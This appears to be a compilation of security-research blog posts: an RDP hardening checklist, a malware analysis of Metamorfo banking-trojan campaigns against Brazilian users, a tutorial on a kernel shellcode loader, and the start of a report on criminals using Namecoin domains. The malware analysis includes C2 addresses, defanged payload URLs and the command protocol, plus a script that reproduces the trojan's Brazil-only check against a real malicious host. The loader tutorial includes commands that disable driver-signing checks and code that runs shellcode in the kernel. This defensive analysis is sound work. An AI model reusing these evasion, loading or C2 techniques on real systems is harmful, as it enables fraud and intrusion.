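    destinations_per_user[user].add(destination)

for user, total in logons_per_user.items():
    print(user, total, "logons,",
          len(sources_per_user[user]), "source systems,",
          len(destinations_per_user[user]), "destination systems")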

Recommendations

While baselining RDP activity may not readily identify threat actors who do not utilize this technique, or who take extra steps to blend in with legitimate user activity, it will continually help analysts better understand what normal behavior looks like in their specific environments – and could ultimately identify anomalies or potential indicators of unauthorized activity.

The following recommendations can help maximize the effectiveness of your RDP baselining exercises, while also reducing the opportunities for RDP to be leveraged by malicious actors within your environment:

  1. Disable the remote desktop service on end-user workstations and laptops, as well as systems where the service is not required for remote connectivity.
  2. Where connectivity using RDP is required, implement a combination of host and network-based controls to enforce that RDP connectivity must be initiated from specific jump boxes and centralized management servers for remote connection to endpoints.
  3. Host-based firewall rules that explicitly deny inbound RDP connections provide enhanced protections, especially for remote users that may utilize their system at locations outside of an organization’s managed infrastructure. Use host-based firewall rules to:
    • Deny inbound RDP connections by default.
    • When required, explicitly permit inbound RDP only from IP addresses correlating to authorized jump boxes.
  4. Employ the “Deny log on through Remote Desktop Services” security setting to prevent standard users from connecting to endpoints using RDP.
    • Ideally, this setting should also deny RDP access for privileged accounts (e.g. domain administrators, service accounts) on endpoints, as these types of accounts are commonly leveraged by attackers for laterally moving to sensitive systems within an environment.
  5. Prevent the use of RDP using local accounts by:
    • Installing KB2871997, and adding the SID “S-1-5-114: NT AUTHORITY\Local account and member of Administrators group” to the “Deny log on through Remote Desktop Services” security setting on endpoints. This can be accomplished by using Group Policy.
    • Randomizing passwords for the built-in local administrator account on endpoints with a solution such as Microsoft LAPS.
  6. Ensure that EID 21, EID 23, EID 24, and EID 25 within the “TerminalServices LocalSessionManager Operational” event log are being captured and forwarded to a SIEM or log aggregator.
  7. Confirm that EID 4624 within the “Security” event log is being captured and forwarded to a SIEM or log aggregator.
  8. Increase the maximum size of the “TerminalServices LocalSessionManager Operational” event log to at least 500 MB. This can be accomplished by using Group Policy Preferences (GPP) to modify the “MaxSize” registry value within the registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TerminalServices-LocalSessionManager/Operational” on endpoints.
  9. Increase the maximum size of the “Security” event log to at least 1 GB.
  10. Monitor for evidence of the “Security” and “TerminalServices LocalSessionManager Operational” event logs being cleared (EID 1102).
  11. Create and regularly update documentation that maps user accounts and hostnames to business units.
  12. Ensure DHCP logs are archived and easily accessible to correlate source system IP addresses with their hostname at the time of a logon event.

Metamorfo Campaigns Targeting Brazilian Users

FireEye Labs recently identified several widespread malspam (malware spam) campaigns targeting Brazilian companies with the goal of delivering banking Trojans. We are referring to these campaigns as Metamorfo. Across the stages of these campaigns, we have observed the use of several tactics and techniques to evade detection and deliver the malicious payload. In this blog post we dissect two of the main campaigns and explain how they work.

Campaign #1

The kill chain starts with an email containing an HTML attachment with a refresh tag that uses a Google URL shortener as the target. Figure 1 shows a sample email, and Figure 2 shows the contents of the HTML file.


Figure 1: Malicious Email with HTML Attachment


Figure 2: Contents of HTML File

When the URL is loaded, it redirects the victim to a cloud storage site such as GitHub, Dropbox, or Google Drive to download a ZIP file. An example is shown in Figure 3.


Figure 3: URL Shortener Redirects to Github Link

The ZIP archive contains a malicious portable executable (PE) file with an embedded HTML Application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe.

The HTA script (Figure 4) contains VBS code that fetches a second blob of VBS code encoded in base64 form from hxxp://<redacted>/ilha/pz/logs.php. 


Figure 4: Contents of HTA File

After the second stage of VBS is decoded (Figure 5 and Figure 6), the script downloads the final stage from hxxp://<redacted>/28022018/pz.zip. 


Figure 5: Contents of Decoded VBS


Figure 6: More Contents of Decoded VBS

The downloaded ZIP file contains four files, two of which are PE files: one is a legitimate Windows tool, pvk2pfx.exe, which is abused for DLL side-loading, and the other is the malicious banking Trojan DLL.

The VBS code unzips the archive, changes the extension of the legitimate Windows tool from .png to .exe, and renames the malicious DLL as cryptui.dll. The VBS code also creates a file in C:\Users\Public\Administrador\car.dat with random strings. These random strings are used to name the Windows tool, which is then executed. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.
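One defensive way to hunt for this pattern is to look for copies of cryptui.dll sitting next to executables in user-writable directories, where the legitimate system DLL does not belong. The hedged sketch below illustrates the idea; the search roots are assumptions and would need tuning per environment:

import os

# The legitimate cryptui.dll lives in System32/SysWOW64, so a copy alongside an
# EXE in a user-writable path is a side-loading red flag worth triaging.
search_roots = [os.path.expandvars(r"%PUBLIC%"), os.path.expandvars(r"%APPDATA%")]

for root in search_roots:
    for dirpath, _, filenames in os.walk(root):
        lowered = [name.lower() for name in filenames]
        if "cryptui.dll" in lowered and any(name.endswith(".exe") for name in lowered):
            print("Possible side-loading staging directory:", dirpath)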

In Q4 of 2017, a similar malspam campaign delivered the same banking Trojan by using an embedded JAR file attached in the email instead of an HTML attachment. On execution, the Java code downloaded a ZIP archive from a cloud file hosting site such as Google Drive, Dropbox, or Github. The ZIP archive contained a legitimate Microsoft tool and the malicious Trojan.

Banking Trojan Analysis

The Trojan expects to be located in the hardcoded directory C:\Users\Public\Administrador\ along with three other files to start execution. As seen in Figure 7, these files are:

  • car.dat (randomly generated name given to Windows tool)
  • i4.dt (VBS script that downloads the same zip file)
  • id (ID given to host)
  • cryptui.dll (malicious Trojan)


Figure 7: Contents of ZIP Archive

Persistence

The string found in the file C:\Users\Public\Administrador\car.dat is extracted and used to add the registry key Software\Microsoft\Windows\CurrentVersion\Run\<string from car.dat> for persistence, as shown in Figure 8.


Figure 8: Reading from car.dat File

The sample also looks for a file named i4.dt in the same directory, extracts its contents, renames the file to icone.vbs, and creates a new persistence key (Figure 9) in Software\Microsoft\Windows\CurrentVersion\Run to open this file.


Figure 9: Persistence Keys

The VBS code in this file (Figure 10) has the ability to recreate the whole chain and download the same ZIP archive.


Figure 10: Contents of VBS Script

Next, the Trojan searches for several folders in the Program Files directories, including:

  • C:\Program Files\AVG
  • C:\Program Files\AVAST Software
  • C:\Program Files\Diebold\Warsaw
  • C:\Program Files\Trusteer\Rapport
  • C:\Program Files\Java
  • C:\Program Files (x86)\scpbrad

If any of the folders are found, this information, along with the hostname and Operating System version, is sent to a hardcoded domain with the hardcoded User-Agent value “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0” in the format shown in Figure 11. The value of AT is “<host_name+OS&MD>=<list of folders found>”.


Figure 11: Network Traffic for Host Enumeration

The sample iterates through the running processes, kills the following, and prevents them from launching:

  • msconfig.exe
  • TASKMGR.exe
  • regedit.exe
  • ccleaner64.exe
  • taskmgr.exe
  • itauaplicativo.exe

Next, it uses GetForegroundWindow to get a handle to the window the user is viewing and GetWindowText to extract the title of the window. The title is compared against a hardcoded list of Brazilian banking and digital coin sites. The list is extensive and includes major organizations and smaller entities alike. 

If any of those names are found and the browser is one of the following, the Trojan will terminate that browser.

  • firefox.exe
  • chrome.exe
  • opera.exe
  • safari.exe

The folder C:\Users\Public\Administrador\logs\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images.


Figure 12: Malware Capturing Mouse Clicks

Command and Control

The command and control (C2) server is selected based on the string in the file “id”:

  • al -> '185.43.209[.]182'
  • gr -> '212.237.46[.]6'
  • pz -> '87.98.146[.]34'
  • mn -> '80.211.140[.]235'

The connection to one of the hosts is then started over raw TCP on port 9999. The command and control communication generally follows the pattern <|Command |>, for example:

  • '<|dispida|>logs>SAVE<' sends the screenshots collected in gh.txt.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep the connection alive.
  • '<|INFO|>' returns when the infection first started, based on the file timestamp of car.dat, along with '<|>' and the host information.
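For analysts emulating this C2, for example in a sandbox, the framing is simple to parse. The sketch below extracts commands wrapped in <|...|> markers and answers the keep-alive; everything beyond the documented examples is an assumption:

import re

FRAME = re.compile(r"<\|\s*([A-Za-z]+)([^|]*)\|>")

def parse_commands(buffer):
    # Returns (command, argument) pairs found in a raw buffer from the server.
    return [(m.group(1).upper(), m.group(2).strip()) for m in FRAME.finditer(buffer)]

def keepalive_reply(buffer):
    # The infected host answers the server's <PING> with <PONG>.
    return "<PONG>" if "<PING>" in buffer else ""

print(parse_commands("<|WAIT 30|><|CONNECT 203.0.113.5:9999|>"))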

There were only four possible IP addresses that the analyzed sample could connect to, based on the strings found in the file “id”. After further researching the associated C2 infrastructure (Figure 13), we were able to estimate the potential number of victims for this particular campaign.

 

Figure 13: Command and Control Server Open Directories

Inside the open directories, we found subdirectories corresponding to the different active campaigns; each contained statistics on the number of victims reporting to the C2. As of 3/27/2018, the numbers were:

  • al – 843
  • ap – 879
  • gr – 397
  • kk – 2,153
  • mn – 296
  • pz – 536
  • tm – 187

A diagram summarizing Campaign #1 is shown in Figure 14.


Figure 14: Infection Chain of Campaign #1

Campaign #2

In the second campaign, FireEye Labs observed emails with links to legitimate domains (such as hxxps://s3-ap-northeast-1.amazonaws[.]com/<redacted>/Boleto_Protesto_Mes_Marco_2018.html) or compromised domains (such as hxxps://curetusu.<redacted>-industria[.]site/) that use a refresh tag with a URL shortener as the target. The URL shortener redirects the user to an online storage site, such as Google Drive, Github, or Dropbox, that hosts a malicious ZIP file. A sample phishing email is shown in Figure 15.


Figure 15: Example Phishing Email

The ZIP file contains a malicious executable written in AutoIt (contents of this executable are shown in Figure 16). When executed by the user, it drops a VBS file to a randomly created and named directory (such as C:\mYPdr\TkCJLQPX\HwoC\mYPdr.vbs) and fetches contents from the C2 server.


Figure 16: Contents of Malicious AutoIt Executable

Two files are downloaded from the C2 server. One is a legitimate Microsoft tool and the other is a malicious DLL: 

  • https[:]//panel-dark[.]com/w3af/img2.jpg
  • https[:]//panel-dark[.]com/w3af/img1.jpg

Those files are downloaded and saved into random directories named with the following patterns:

  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\<5 random chars>.exe
  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\CRYPTUI.dll 

The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system.


Figure 17: Persistence Key

The VBS file (Figure 18) will launch and execute the downloaded legitimate Windows tool, which in this case is Certmgr.exe. This tool will be abused using the DLL side loading technique. The malicious Cryptui.dll is loaded into the program instead of the legitimate one and executed.


Figure 18: Contents of Dropped VBS File

Banking Trojan Analysis

Like the Trojan from the first campaign, this sample is executed through search-order hijacking. In this case, the binary abused is a legitimate Windows tool, Certmgr.exe, that loads Cryptui.dll. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

The malicious DLL exports 21 functions. Only DllEntryPoint contains real code that is necessary to start the execution of the malicious code. The other functions return hardcoded values that serve no real purpose.

On execution, the Trojan creates a mutex called "correria24" to allow only one instance of it to run at a time.

The malware attempts to resolve “www.goole[.]com” (most likely a misspelling). If successful, it sends a request to hxxp://api-api[.]com/json in order to detect the external IP of the victim. The result is parsed and execution continues only if the country code matches “BR”, as shown in Figure 19.


Figure 19: Country Code Check
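
The gating logic is simple enough to restate in a few lines. The following Python sketch reproduces it for lab purposes only; the JSON field name ("country_code") is an assumption, since the sample parses an equivalent value from the api-api[.]com response:

import json
import socket
import urllib.request

def should_continue():
    # The sample first resolves a hard-coded domain as a connectivity check
    # (it uses the misspelled "www.goole.com").
    try:
        socket.gethostbyname("www.google.com")
    except socket.gaierror:
        return False
    # Look up the external IP and continue only for Brazilian hosts.
    with urllib.request.urlopen("http://api-api.com/json", timeout=10) as resp:
        geo = json.loads(resp.read().decode("utf-8", errors="replace"))
    return geo.get("country_code", "").upper() == "BR"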

The malware creates an empty file in %appdata%\Mariapeirura on first execution, which serves as a mutex lock, before attempting to send any collected information to the C2 server. This is done in order to get only one report per infected host.

The malware collects host information, base64 encodes it, and sends it to two C2 servers. The following items are gathered from the infected system:

  • OS name
  • OS version
  • OS architecture
  • AV installed
  • List of banking software installed
  • IP address
  • Directory where malware is being executed from

The information is sent to hxxp://108.61.188.171/put.php (Figure 20).


Figure 20: Host Recon Data Sent to First C2 Server

The same information is sent to panel-dark[.]com/Contador/put.php (Figure 21).


Figure 21: Host Recon Data Sent to Second C2 Server

The malware alters the value of the registry key Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ExtendedUIHoverTime to 2710 in order to change the number of milliseconds a thumbnail is shown when hovering over the taskbar, as seen in Figure 22.


Figure 22: ExtendedUIHoverTime Registry Key Change

Like the Trojan from the first campaign, this sample checks if the foreground window's title contains names of Brazilian banks and digital coins by looking for hardcoded strings.

The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23.


Figure 23: Fake Form Displaying Windows Update

The sample also contains keylogger functionality, as shown in Figure 24.


Figure 24: Keylogger Function

Command and Control

The Trojan’s command and control structure is identical to that of the first sample. The commands are denoted by the <|Command|> syntax.

  • <|OK|> gets a list of banking software installed on the host.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep connection alive.
  • <|dellLemb|> deletes the registry key \Software\Microsoft\Internet Explorer\notes.
  • EXECPROGAM calls ShellExecute to run the application given in the command.
  • EXITEWINDOWS calls ExitWindowsEx.
  • NOVOLEMBRETE creates and stores data sent with the command in the registry key \Software\Microsoft\Internet Explorer\notes.


Figure 25: Partial List of Victims

Most of the important strings in this sample are encrypted. We provide the following script (Figure 26) to decrypt them.


Figure 26: String Decryption Script

Conclusion

The use of multi-stage infection chains makes it challenging to research these types of campaigns all the way through.

As demonstrated by our research, the attackers are using various techniques to evade detection and infect unsuspecting Portuguese-speaking users with banking Trojans. The use of public cloud infrastructure to help deliver the different stages plays a particularly big role in delivering the malicious payload. The use of different infection methods combined with the abuse of legitimate signed binaries to load malicious code makes these campaigns worth highlighting.

Indicators of Compromise

Campaign #1
TYPE HASH DESCRIPTION
MD5 860fa744d8c82859b41e00761c6e25f3 PE with Embedded HTA
MD5 3e9622d1a6d7b924cefe7d3458070d98 PE with Embedded HTA
MD5 f402a482fd96b0a583be2a265acd5e74 PE with Embedded HTA
MD5 f329107f795654bfc62374f8930d1e12 PE with Embedded HTA
MD5 789a021c051651dbc9e01c5d8c0ce129 PE with Embedded HTA
MD5 68f818fa156d45889f36aeca5dc75a81 PE with Embedded HTA
MD5 c2cc04be25f227b13bcb0b1d9811e2fe cryptui.dll
MD5 6d2cb9e726c9fac0fb36afc377be3aec id
MD5 dd73f749d40146b6c0d2759ba78b1764 i4.dt
MD5 d9d1e72165601012b9d959bd250997b3 VBS file with commands to create staging directories for malware
MD5 03e4f8327fbb6844e78fda7cdae2e8ad pvk2pfx.exe [Legit Windows Tool]
URL   hxxp://5.83.162.24/ilha/pz/logs.php
URL   hxxp://5.83.162.24/28022018/pz.zip 
C2   ibamanetibamagovbr[.]org/virada/pz/logs.php
URL   sistemasagriculturagov[.]org
URL   hxxp://187.84.229.107/05022018/al.zip
Campaign #2
TYPE HASH DESCRIPTION
MD5 2999724b1aa19b8238d4217565e31c8e AutoIT Dropper
MD5 181c8f19f974ad8a84b8673d487bbf0d img1.jpg [Legit Windows Tool]
MD5 d3f845c84a2bd8e3589a6fbf395fea06 img2.jpg [Banking Trojan]
MD5 2365fb50eeb6c4476218507008d9a00b Variants of Banking Trojan
MD5 d726b53461a4ec858925ed31cef15f1e Variants of Banking Trojan
MD5 a8b2b6e63daf4ca3e065d1751cac723b Variants of Banking Trojan
MD5 d9682356e78c3ebca4d001de760848b0 Variants of Banking Trojan
MD5 330721de2a76eed2b461f24bab7b7160 Variants of Banking Trojan
MD5 6734245beda04dcf5af3793c5d547923 Variants of Banking Trojan
MD5 a920b668079b2c1b502fdaee2dd2358f Variants of Banking Trojan
MD5 fe09217cc4119dedbe85d22ad23955a1 Variants of Banking Trojan
MD5 82e2c6b0b116855816497667553bdf11 Variants of Banking Trojan
MD5 4610cdd9d737ecfa1067ac30022d793b Variants of Banking Trojan
MD5 34a8dda75aea25d92cd66da53a718589 Variants of Banking Trojan
MD5 88b808d8164e709df2ca99f73ead2e16 Variants of Banking Trojan
MD5 d3f845c84a2bd8e3589a6fbf395fea06 Variants of Banking Trojan
MD5 28a0968163b6e6857471305aee5c17e9 Variants of Banking Trojan
MD5 1285205ae5dd5fa5544b3855b11b989d Variants of Banking Trojan
MD5 613563d7863b4f9f66590064b88164c8 Variants of Banking Trojan
MD5 3dd43e69f8d71fcc2704eb73c1ea7daf Variants of Banking Trojan
C2   https[:]//panel-dark[.]com/w3af/img2.jpg 
C2   https[:]//panel-dark[.]com/w3af/img1.jpg 

Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.


Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.


Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.


Figure 3: Using kscldr.exe to load kernel shellcode
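
If xxd is not available, the same two-byte file can be produced with a couple of lines of Python (the file name is arbitrary):

# Write a minimal do-nothing shellcode file: NOP (0x90) followed by RET (0xC3).
with open("nopret.bin", "wb") as f:
    f.write(b"\x90\xc3")

Passing the resulting file name to kscldr.exe hands that buffer to the driver, just as shown in Figure 3.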

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.


Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.


Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcome to do so, but beware: you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for the purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.


Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space. When the user application opens the device file and invokes WriteFile, the driver calls ExAllocatePoolWithTag specifying a PoolType of NonPagedPool (which is executable), and writes the buffer to the newly allocated memory. After the write operation, the user application can call DeviceIoControl to call into the shellcode. In response, the driver sets the appropriate flags on the device object, issues a breakpoint to pass control to the kernel debugger, and finally calls the shellcode as if it were a function.
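
To make that sequence concrete, here is an illustrative Python/ctypes sketch of the user-space side only; the symbolic link name (\\.\kscldr) and the IOCTL value are assumptions made for illustration, since the real values ship inside kscldr.exe:

import ctypes
import ctypes.wintypes as wt

GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
IOCTL_RUN_SHELLCODE = 0x222000  # placeholder control code (assumption)

k32 = ctypes.windll.kernel32

def load_and_run(shellcode):
    handle = k32.CreateFileW(r"\\.\kscldr", GENERIC_WRITE, 0, None,
                             OPEN_EXISTING, 0, None)
    if handle == -1:
        raise OSError("could not open the loader device")
    try:
        written = wt.DWORD(0)
        # WriteFile: the driver copies the buffer into NonPagedPool memory.
        k32.WriteFile(handle, shellcode, len(shellcode),
                      ctypes.byref(written), None)
        returned = wt.DWORD(0)
        # DeviceIoControl: the driver breaks into the kernel debugger and then
        # calls the buffer as if it were a function.
        k32.DeviceIoControl(handle, IOCTL_RUN_SHELLCODE, None, 0, None, 0,
                            ctypes.byref(returned), None)
    finally:
        k32.CloseHandle(handle)

load_and_run(b"\x90\xc3")  # the NOP/RET example from earlier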

While You’re Here

Driver development opens the door to unique instrumentation opportunities. For example, Figure 7 shows a few kernel callback routines described in the WDK help files that can track system-wide process, thread, and DLL activity.


Figure 7: WDK kernel-mode driver architecture reference

Kernel development is a deep subject that entails a great deal of study, but the WDK also comes with dozens upon dozens of sample drivers that illustrate correct Windows kernel programming techniques. This is a treasure trove of Windows internals information, security research topics, and instrumentation possibilities. If you have time, take a look around before you get back to work.

Wrap-Up

We’ve shared FLARE’s tool for loading privileged shellcode in test environments so that we can dynamically analyze kernel shellcode. We hope this provides a straightforward way to quickly triage kernel shellcode if it ever appears in your environment. Download the source code now.

Do you want to learn more about these tools and techniques from FLARE? Then you should take one of our Black Hat classes in Las Vegas this summer! Our offerings include Malware Analysis Crash Course, macOS Malware for Reverse Engineers, and Malware Analysis Master Class.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: Blockchain Infrastructure Use

UPDATE (May 31, 2018): A section of the post on commonly used OpenNIC IPs has been removed to avoid any implication that the OpenNIC IPs are inherently malicious, which is not the case.

Introduction

Cyber criminals have always been attracted to cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a payment method for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity and subsequent rising price of cryptocurrencies by conducting various operations aimed at them, such as malicious cryptocurrency mining, collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

Coinciding with the rising interest in stealing cryptocurrencies, distributed ledger technology (DLT), the technology that underpins cryptocurrencies, has also provided cyber criminals with a unique means of hosting their malicious content. This blog covers the growing trend of cyber criminals using blockchain domains for malicious infrastructure.

Blockchain Infrastructure Use

Traditionally, cyber criminals have used various methods to obfuscate malicious infrastructure that they use to host additional payloads, store stolen data, and/or function as command and control (C2) servers. Traditional methods include using bulletproof hosting, fast-flux, Tor infrastructure, and/or domain generation algorithms (DGAs) to help obfuscate the malicious infrastructure. While we expect cyber criminals to continue to use these techniques for the foreseeable future, another trend is emerging: the use of blockchain infrastructure.

Underground Interest in Blockchain Infrastructure

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency infrastructure-related topics dating back to at least 2009 within underground communities. While searches for certain keywords fail to provide context, the frequency of specific words, such as blockchain, Namecoin, and .bit, shows a sharp increase in conversations surrounding these topics beginning in 2015 (Figure 1).


Figure 1: Underground keyword mentions

Namecoin Domains

Namecoin is a cryptocurrency based on the Bitcoin code that is used to register and manage domain names with the top-level domain (TLD) .bit. Everyone who registers a Namecoin domain is essentially their own domain registrar; however, domain registration is not associated with an individual's name or address. Rather, domain ownership is based on the unique encrypted hash of each user. This essentially creates the same anonymous system as Bitcoin for internet infrastructure, in which users are only known through their cryptographic identity. Figure 2 illustrates the Namecoin domain name generation process.


Figure 2: Namecoin domain creation process

As Namecoin is decentralized, with no central authority managing the network, domains registered with Namecoin are resistant to being hijacked or shut down. These factors, coupled with the comparative anonymity, make Namecoin an increasingly attractive option for cyber criminals in need of supporting infrastructure for their malicious operations.

Navigating to Namecoin Domains

Domains registered with Namecoin use the TLD .bit, and are not managed by standard DNS providers. Consequently, a client will be unable to establish a connection to these blockchain domains unless additional configurations are made. According to the Namecoin wiki, individuals can take one of the steps shown in Figure 3 to browse .bit domains.


Figure 3: Options for navigating to Namecoin domains outlined on Namecoin wiki

These options are not ideal for cyber criminals, as downloading the entire blockchain onto an infected host would require significant space and bandwidth, and routing their malicious traffic through an unknown third party could result in their traffic being blocked by the resolver. As a result, many have configured their malware to query their own privately managed Namecoin-compatible OpenNIC DNS (Figure 4), or to query other compatible servers they've purchased through underground infrastructure offerings. Bulletproof hosting providers, such as Group 4, have capitalized on the increased demand for .bit domains by adding support to allow malicious actors to query compatible servers.


Figure 4: Blockchain domain support advertised on OpenNIC website

Underground Advertisements for Namecoin Support

The following underground advertisements relating to the use of .bit domains have been observed by researchers over the past several years. These posts range from actors offering .bit compatible modules or configuration updates for popular banking Trojans to .bit infrastructure offerings.

Sample Advertisement #1

Figure 5 shows an advertisement, observed in late 2015, posted by the actor "wachdog" in a popular Russian-speaking marketplace. The actor advertised a small utility (10 KB in size) that is compatible with both Windows and Android operating systems, and would allow for the communication to and from .bit domains.

Advertisement Translated Text:

The code is written in C+ for WinAPI or Java for Android. It can be used for small stealth applications to access .bit domains.

The registration of new domain costs 0.02 NMC, update of a record - 0.005 NMC.

So, the price for domain registration and update will be approximately 0.0072$ and 0.0018$.

The code works in all Windows starting from XP, it doesn't require additional libraries, admin privileges, it doesn't download a lot of data. The size of compiled code is 10 KB. It's easy to write it in asm, paskal, c#, java etc. It also works for Android (all versions).

You should download the Namecoin wallet, credit it with the minimum amount of NMC and register your own domain using the wallet. IP of C&C can be linked to the domain also using the wallet (one of many, everything works as for normal DNS). Create a build of your software locked to .bit domain. In case the IP of your server is listed, just change the DNS record and assign your domain a new IP for just for 0.005 NMC. No need in new rebuild or registration of new domains. .bit domain cannot be taken, botnet cannot be stolen.

Price:

Technology + code in C: $300 USD

Technology + code in C + code in Java for Android: $400 USD
Payment methods: BTC, PerfectMoney

Figure 5: Actor "wachdog" advertises utility to connect to .bit domains in late 2015

Sample Advertisement #2

In late 2017, actor "Discomrade" advertised a new HTTP distributed denial of service (DDoS) malware named "Coala" on a prominent Russian-language underground forum (Figure 6). According to the advertisement, Coala focuses on L7 (HTTP) attacks and can overcome Cloudflare, OVH, and BlazingFast DDoS protections. The original posting stated that the actor was working on adding support for .bit domains, and later updated the forum post to specify that Coala was able to support .bit domain communications.

Advertisement Translated Text:

Coala - Http DDoS Bot, .net 2.0, bypass cloudflare/ovh/blazi...
The sale resumed.

I changed my decision to rewrite the bot from the scratch on native language.
